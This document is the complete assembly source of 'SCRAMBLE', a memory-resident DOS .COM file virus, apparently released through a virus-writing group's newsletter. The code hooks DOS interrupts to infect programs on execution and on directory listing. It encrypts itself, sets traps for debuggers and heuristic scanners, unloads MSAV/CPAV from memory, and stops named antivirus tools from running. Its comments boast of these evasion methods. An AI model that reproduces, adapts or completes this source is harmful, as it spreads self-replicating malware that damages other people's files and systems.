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; SCRAMBLE --- Memory resident .COM infector.
; Uses many methods to slip through heuristic and standard virus scanners.
; #1 Pulls MSAV and CPAV out of memory.
; #2 Has self modifying JMP at the beginning to confuse TBAV
; #3 Has the anti-fprot code from YB-X inside.
; #4 Doesn't let many known AV products run. It doesn't delete them
; unlike earlier projects.
; #5 Includes filters in the infection process to exclude possible "bait"
; files.
; #6 Uses the System File Tables for infection. This is a beautiful method
; to get alot of file information quickly.
; #7 Utilizes directory stealth. (FCB only)
; Features: Infects on 11h, 12h, and 4Bh. (Directory and Execute)
; Also SCRAMBLE includes many debuggers traps. They are concentrated in
; the beginning.
; Nikademus [CrYpT]
; ^^^^^^^
; Smile Urnst....
; ********************** [Scramble] ***************************************
.radix 16
code segment
model small
assume cs:code, ds:code, es:code
org 100h
len equ offset last - start ; Shadows length
vir_len equ len / 16d ; paragraphs of memory needed
encryptlength equ (last - begin)/2+1 ; encrypt all but 3 bytes
db 0BBh ; mov bx, xxxx
off_start: ;
dw offset begin ; this is fixed up during inf.
xor_start: ;
db 81h ; XOR WORD PTR [BX], ????h
db 37h ;
e_v: ;
dw 0000h ; encryption word
inc bx ;
inc bx ;
db 81h, 0FBh ; cmp bx, xxxx
off_last: ;
dw offset last ;
jng xor_start ;
jmp inner_loop
db 'BEER and TEQUILA forever !' ; I love a good joke...
mov bx, offset begin_2 ; Inner encryption loop
mov cx, (last - begin_2)/2+1 ;
xor ax, ax ;
mov es, ax ;
mov dx, es:[4*1] ; Save part of int 3
ax_encrypt: ;
mov ax, 0000h ; encryption word
encrypt_loop_2: ;
mov es:[4*1], cx ; save cx on part of int 3
xor cx, cx ; clear cx
xchg al, ah ; The purpose of this
xor word ptr [bx], ax ; encryption is to be
xchg al, ah ; a pain
sub bx, -2 ; for people wanting to
mov cx, es:[4*1] ; trace.
loop encrypt_loop_2 ;
mov es:[4*1], dx ; restore int 3
jmp virus
db '[Scramble] By Nikademus $'
db 'Read CRYPT Today!. $'
mov dx, 5945h ; pull CPAV (MSAV)
mov ax, 64001d ; out of memory
int 16h ; This also confused
call bp_fixup ; bp fixup
bp_fixup: ;
pop bp ;
sub bp, offset bp_fixup ;
xor ax, ax ;
mov es, ax ;
mov cx, es:[4*01h+2] ; Installation Check
mov bx, es:[4*03h+2] ; int 01 and 03 are normally
cmp cx, bx ; equal. Shadow changes
je next_early ; int 3h.
jmp fix_host ;
mov es:[4*3h], ax ;
mov es:[4*3h+2], ax ; zero out 1 and 3
mov es:[4*1h], ax ; Debugger fix...
mov es:[4*1h+2], ax ; We hatesss Debuggersss
; Don't we Preciousss.
; - Tolkien
call screw_fprot ; confusing f-protect's
call screw_fprot ; heuristic scanning
call screw_fprot ; Still effective as of
call screw_fprot ; version 2.10
call screw_fprot ;
call screw_fprot ; [cf] Crypt Newsletter 18
call screw_fprot ; for explanation &
call screw_fprot ; rationale
call screw_fprot ;
call screw_fprot ;
push cs ;
pop es ;
push cs ;
pop ds ;
mov bx,cs ; reduce memory size
dec bx ;
mov ds,bx ; My standard memory
cmp byte ptr ds:[0000],5a ; routine...
jne fix_host ;
mov bx,ds:[0003] ;
sub bx, 100h ; # of 16byte paragraphs
mov ds:0003,bx ; to grab (4k)
xchg bx, ax ; copy self to the new
mov bx, es ; 'unused' part of memory
add bx, ax ; QEMM calls this area
mov es, bx ; unused when Shadow is
mov cx, len ; resident.
mov ax, ds ;
inc ax ;
mov ds, ax ;
lea si, ds:[offset start+bp] ;
lea di, es:0100 ;
rep movsb ;
xor ax, ax
mov ds, ax
push ds
lds ax, ds:[21h*4] ; get int 21h
mov word ptr es:old_21h, ax ; save 21
mov word ptr es:old_21h+2, ds
mov bx, ds ; bx = ds
pop ds
mov word ptr ds:[3h*4], ax ; put old 21 in int 3h
mov word ptr ds:[3h*4+2], bx ;
mov word ptr ds:[21h*4], offset Scramble ; put self in 21
mov ds:[21h*4+2], es ;
push cs
pop ds
push cs
pop es
mov di,100h ; Replace overwritten bytes
push di ; Save the 100h
lea si, ds:[vict_head + bp] ;
mov cx, 25d ;
rep movsb ; Fix 'em
xor ax, ax ; Clean up after myself.
xor bx, bx ;
xor dx, dx ;
xor si, si ;
xor di, di ;
ret ; Return to 100h
jmp $ + 2 ; Pseudo-nested calls to confuse
call screw2 ; f-protect's heuristic
call screw2 ; analysis
call screw2 ;
call screw2 ;
call screw2 ; These are straight from
ret ; YB-X.
screw2: ;
jmp $ + 2 ;
call screw3 ;
call screw3 ;
call screw3 ;
call screw3 ;
call screw3 ;
ret ;
screw3: ;
jmp $ + 2 ;
call screw4 ;
call screw4 ;
call screw4 ;
call screw4 ;
call screw4 ;
ret ;
screw4: ;
jmp $ + 2 ;
ret ;
vict_head db 90h, 0CDh, 20h, 90h, 90h, 90h, 90h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h, 90h
cmp ah, 11h ; Directory infect.
je d_h_1 ; + Stealth
cmp ah, 12h ; Directory infect.
je d_h_1 ; + Stealth
pushf ; Save all these
push ax ; registers.
push bx ;
push cx ;
push dx ;
push si ;
push di ;
push ds ;
push es ;
cmp ah, 4Bh ; Infect + AV filter
je infect ;
pop es ; Goodbye cruel world
pop ds ; I'm leaving you today
pop di ; Goodbye
pop si ; ..
pop dx ; Goodbye
pop cx ; ..
pop bx ; ...goodbye
pop ax ; -Pink Floyd
popf ; (Well...Close)
jmp dword ptr cs:[old_21h] ; This is The End.
jmp dir_handler_1
mov word ptr cs:victim_name,dx
mov word ptr cs:victim_name+2,ds
mov di,dx
push ds
pop es ; es:di -> name
mov al,'.' ; find the period
repne scasb ;
call name_tester
cmp ax, 0CCCCh ; DDDDh marks AV
je cont_inf ;
jmp notforme
cmp word ptr es:[di], 'OC'
jne notforme
call HOOK_24
mov ax, 3D00h ; open read/only
lds dx, cs:[victim_name] ;
int 3h ;
jc notforme ; handle errors
xchg bx, ax ;
call infection_test ; is it infected?
cmp ax, 0CCCCh ; FFFF = infected
je continue_inf ; DDDD = don't infect
mov byte ptr es:[di+2], 00h ; mark it read/only
mov ax, 3E00h ; close file
int 3h ;
jmp notforme
push cs ; infect 'em
pop es ;
call infect_victim ;
jmp notforme ;
mov ah, 2Ch ; get random number
int 3h ; for encryption
or dx, dx ;
jz infect_victim ;
mov word ptr [offset e_v], dx
mov word ptr [offset e_value_1], dx
sub cx, dx
mov word ptr [offset ax_e], cx
xchg cl, ch
mov word ptr [offset ax_encrypt+1], cx
mov ax, [vict_size]
push ax
mov si, ax ; fix BX offset in head
add si, ((offset begin-offset start)+100h)
mov word ptr [off_start], si ; start of 'cryption
push si
add si, len
mov word ptr [off_last], si ; end of 'cryption
pop si
add si, (offset begin_2 - offset begin)
mov word ptr [offset start_2+1], si ; begin fixup #2
mov si, offset start ; copy virus to buffer
mov di, offset encryptbuffer ;
mov cx, last-start ;
rep movsb ;
pop ax
sub ax, 3d ; construct jump
mov word ptr [offset jmp_offset], ax ;
push bx ; inner encryption
mov bx, offset encryptbuffer ;
add bx, (offset begin_2 - offset start) ;
mov cx, (last - begin_2)/2 +1 ;
e_loop_1: ;
db 81h ; XOR [bx]
db 37h ;
ax_e: ;
dw 0000h ; scrambler
add bx, 2 ;
loop e_loop_1 ; loop
mov bx, offset encryptbuffer ;
add bx, (offset begin - offset start) ; outer encryption
mov cx, (last - begin)/2 +1 ;
e_loop_2: ;
db 81h ; XOR [bx]
db 37h ;
e_value_1: ;
dw 0000h ; scrambler
add bx, 2 ;
loop e_loop_2 ; loop
pop bx
mov ah, 40h ; write virus
mov cx, last-start ;
mov dx, offset encryptbuffer ;
int 3h ;
mov ax, 4200h ; point to front
xor cx, cx ;
xor dx, dx ;
int 3h ;
mov ah, 40h ; write jump
mov dx, offset jmp_create ;
mov cx, 25d ;
int 3h ;
mov dx, word ptr [date] ; Date
mov cx, word ptr [time] ; Time
mov ax,5701h ;
int 3h
mov ax, 3E00h ; close
int 3h ;
mov ax, 4301h ; Restore old attributes
mov cl, byte ptr [attrib] ;
lds dx, cs:victim_name ;
int 3h ;
ret ; Leave this sub-routine
pushf ;
db 9Ah ; Call to
old_21h dd ? ; old int 21 vector
cmp al, 0FFh ; Find something?
jnz next_dir_1 ;
iret ;
push ax ; save registers.
push bx ;
push cx ;
push dx ;
push ds ;
push es ;
push si ;
push di ;
mov ah, 2Fh ; Get DTA
int 3h ; es:bx -> DTA
push es ;
pop ds ; ds = es
cmp byte ptr [bx], 0FFh ; Extended FCB?
jnz not_extended ;
add bx, 7h ;
push cs ; restore es
pop es ;
lea di, [victim_name] ; Dark Angel's code
lea si, [bx+1] ; to turn FCB string
mov cx, 8d ; into an ASCIIZ string
cmp byte ptr ds:[si], ' ' ; find the first space
jz space_found ;
movsb ;
loop space_finder ;
mov al, '.' ; copy the period
stosb ;
mov ax, 'OC' ; test for (CO)M extention
lea si, [bx+9] ;
cmp word ptr [si], ax ;
jnz not_com ;
mov al, 'M' ; Is it an CO(M)
cmp byte ptr [si+2], al ;
jnz not_com ;
mov al, 0 ; end of string byte
stosb ; NULL for C people
push ds ;
pop es ; es = ds
push cs ;
pop ds ; restore ds
xchg di, bx ; es:di points to the DTA
mov ax, 3D00h ; open read/only
lea dx, [victim_name] ;
int 3h ; changes to r/w in the
jc not_com ; system file table
xchg ax, bx ;
push es
push di
push ds
call infection_test ; is it infected?
cmp ax, 0CCCCh ; FFFF = infected
je continue_dir ;
mov byte ptr es:[di+2], 00h ; mark it read/only
push ax
mov ax, 3E00h ; close file
int 3h ;
pop ax ; Save these
pop ds ;
pop di ;
pop es ;
cmp ax, 0DDDDh ; not infected, but
je not_com ; don't infect. IMPORTANT!
mov ax, es:[di+29d]
sub ax, len ; directory stealth
mov es:[di+29d], ax ;
not_com: ; . . .
pop di ; . . . .
pop si ; . . . .
pop es ; . . . .
pop ds ; . . . .
pop dx ; . .
pop cx ; . . . .
pop bx ; . . . .
pop ax ; . . . .
popf ; . . . .
iret ; . . .
pop ds ; Actually get around to infecting
push cs ; the poor little file.
pop es ;
call infect_victim ;
pop di ;
pop es ;
jmp not_com ;
mov al,3 ; Error (Mis)handler
iret ;
cmp word ptr es:[di-3],'MI' ;Integrity Master
je AV ;*IM
cmp word ptr es:[di-3],'XR' ;*rx
je AV ;
cmp word ptr es:[di-3],'PO' ;*STOP
jne next1 ;(VIRSTOP)
cmp word ptr es:[di-5],'TS' ;
je AV ;
next1: cmp word ptr es:[di-3],'VA' ;*AV i.e. cpav
je AV ;(TBAV) (MSAV)
cmp word ptr es:[di-3],'TO' ;*prot f-prot
jne next2 ;
cmp word ptr es:[di-5],'RP' ;
jne next2 ;
AV: jmp AV_Detected ; must be equal
next2: cmp word ptr es:[di-3],'NA' ;*scan McAffee's
jne next3 ;(TBSCAN)
cmp word ptr es:[di-5],'CS' ;
je AV_Detected ;
cmp word ptr es:[di-3],'NA' ;*lean CLEAN..
jne next3 ; why not eh?
cmp word ptr es:[di-5],'EL' ;(TBCLEAN)
je AV_Detected ;
next3: cmp word ptr es:[di-3],'CV' ; Victor Charlie
je AV_Detected ; default *VC
cmp word ptr es:[di-3],'KC' ; VCHECK
jne next4 ; (Victor Charlie)
cmp word ptr es:[di-5],'EH' ; (TBCHECK) *HECK
je AV_Detected ;
cmp word ptr es:[di-3],'ME' ; TBMEM
jne next5 ; *BMEM
cmp word ptr es:[di-5],'MB' ;
je AV_Detected ;
cmp word ptr es:[di-3],'XN' ; TBSCANX
jne next6 ; *CANX
cmp word ptr es:[di-5],'AC' ;
je AV_Detected ;
cmp word ptr es:[di-3],'EL' ; TBFILE
jne next7 ; *FILE
cmp word ptr es:[di-5],'IF' ;
je AV_Detected ;
cmp word ptr es:[di-3],'KS' ; CHKDSK
jne next8 ; *KDSK
cmp word ptr es:[di-5],'DK' ; chkdsk finds false errors
je AV_Detected ; with directory stealth
mov ax, 0CCCCh ; Flag NON-AV
ret ;
mov word ptr es:[di-1], 2020h ; Screw up the search
mov word ptr es:[di+1], 2020h ; clear the .XXX
mov ax, 0DDDDh ; Flag AV
ret ;
HOOK_24: ; hook interrupt 24
push ds ; by direct writes to
push dx ; the
push ax ; interrupt vector
push es ; table
xor ax, ax ;
mov ds, ax ; DOS will fix it back
mov dx, offset new_24h ; all by itself.
mov word ptr ds:[24h*4], dx ; For once, I like what
mov word ptr ds:[24h*4+2], es ; DOS does.
pop es ;
pop ax ;
pop dx ;
pop ds ;
ret ;
infection_test: ; assume file
push cs ; open
pop es ; and bx is handle
push cs
pop ds
push bx ;
mov ax, 1220h ; Get Job File Table
int 2Fh ;
jc error_out ;
mov bl, es:di ;
mov ax, 1216h ; Get System File Table
int 2Fh ; For my file.
jc error_out ;
pop bx
mov byte ptr es:[di+2], 02h ; change to read/write
mov ax, word ptr es:[di + 0Dh] ; get time
mov cs:[time], ax ;
mov ax, word ptr es:[di + 0Fh] ; get date
mov cs:[date], ax ;
mov al, byte ptr es:[di + 04h] ; get attribs
mov cs:[attrib], al ;
mov ax, es:[di + 11h]
cmp ax, 1000d ; size filter
jb filter_error ; only infect files bigger
mov ax, 3F00h ; read in 25 bytes
mov cx, 25d ;
mov dx, offset vict_head ;
int 3h ;
jc error_out ;
; Looking for possible BAIT files.
mov ah, byte ptr cs:[vict_head] ;
cmp ah, 90h ; nop test
je filter_error ;
cmp ah, 0CDh ; INT test
je filter_error ;
mov ax, word ptr cs:[vict_head+1] ;
cmp ah, 0CDh ; INT test
je filter_error ;
cmp al, 0CDh ; INT test
je filter_error ;
mov ax, 4200h ; point to beginning
xor cx, cx ; could have used SFT
xor dx, dx ;
int 3h ;
mov ax, 4202h ; point to end
int 3h ;
mov cs:[vict_size], ax ; infection check
mov cx, word ptr cs:[vict_head] ;
mov ax, 0CCBAh ; me..
cmp ax, cx ;
jnz not_infected ;
mov ax, 0FFFFh ; FF = infected
ret ;
mov ax, 0DDDDh ; not infected
ret ; and DONT infect
mov ax, 0CCCCh ; not infected
jmp_create db 0BAh, 0CCh, 0CCh, 0C6h, 06h, 00h, 01h, 0E9h, 0B8h
db 2Eh, 01h, 0BBh, 01h, 01h, 2Dh, 03h, 01h, 33h, 0C1h
db 0C7h, 07h
jmp_offset db 2Bh, 00h
db 0EBh, 0E7h
last: ; -=< end of encryption. >=-
; The heap........ junk not needed in main program
date dw 00h, 00h
victim_name dd ?
time dw 00h, 00h
attrib db ?
vict_size dw 00h, 00h
encryptbuffer db (last-start)+1 dup (?)
code ends
end start